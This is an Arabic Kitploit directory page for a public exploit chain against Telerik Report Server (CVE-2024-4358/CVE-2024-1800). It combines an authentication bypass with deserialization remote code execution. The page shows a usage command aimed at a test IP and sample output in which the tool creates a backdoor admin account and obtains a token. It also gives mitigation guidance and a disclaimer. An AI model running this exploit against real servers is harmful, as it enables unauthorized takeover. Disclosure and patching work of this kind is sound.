Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-4358 — استغلال تنفيذ الأوامر عن بُعد قبل التحقق من الهوية لخادم تقارير Telerik (CVE-2024-4358/CVE-2024-1800) مع تجاوز المصادقة وتوليد حمولة إلغاء التسلسل. | Kitploit
أدوات/GitHubGitHub/harydhk7/cve-2024-4358
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالتعلم والتعليم
GitHubharydhk7/cve-2024-4358

CVE-2024-4358

استغلال تنفيذ الأوامر عن بُعد قبل التحقق من الهوية لخادم تقارير Telerik (CVE-2024-4358/CVE-2024-1800) مع تجاوز المصادقة وتوليد حمولة إلغاء التسلسل.

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-4358 / CVE-2024-1800

سلسلة استغلال لثغرات إلغاء التسلسل وتجاوز المصادقة في Telerik Report Server لـ CVE-2024-4358/CVE-2024-1800

التحليل الفني

يمكن العثور على تحليل جذري للثغرة على مدونتي

الاستخدام

root@kitploit:~
python CVE-2024-4358.py --target http://192.168.253.128:83 -c "whoami"

(^_^) Progress Telerik Report Server pre-authenticated RCE (CVE-2024-4358/CVE-2024-1800) || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) random backdoor username: oelycslyun
(*) random backdoor password: cqgnacxljo
(*) Attempting to bypass authentication
(+) Authentication bypass was successful, backdoor account created
(+) Saving credentials to credentials.txt
(+) Successfully authenticated as oelycslyun with password cqgnacxljo
(*) got token: zfCch_LNv0PyKfe7eBDYKXV70IOotwNQ2p82aX-JHIMCisVnTW9PWWYUKljhcRw5alubNOg_gXoHT6-hJk4VO-jGZuzmisLIi5A
(*) Generated random report name: qvwdycugmc
(*) Creating malicious report under name qvwdycugmc
(*) Deserialization exploit finished

التخفيفات

قم بالتحديث إلى أحدث إصدار أو خفف المخاطر باتباع التعليمات الواردة في نشرة Progress Advisory

  • https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358

الإشادات تذهب إلى -> /sinsinology

تابعنا على تويتر لأحدث أبحاث الأمان:

  • SinSinology
  • SummoningTeam

إخلاء مسؤولية

تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود منه استخدامه لمهاجمة الأنظمة إلا في الحالات المصرح بها صراحةً. القائمون على المشروع غير مسؤولين عن سوء استخدام البرنامج. استخدم بمسؤولية.

تنزيل الأداة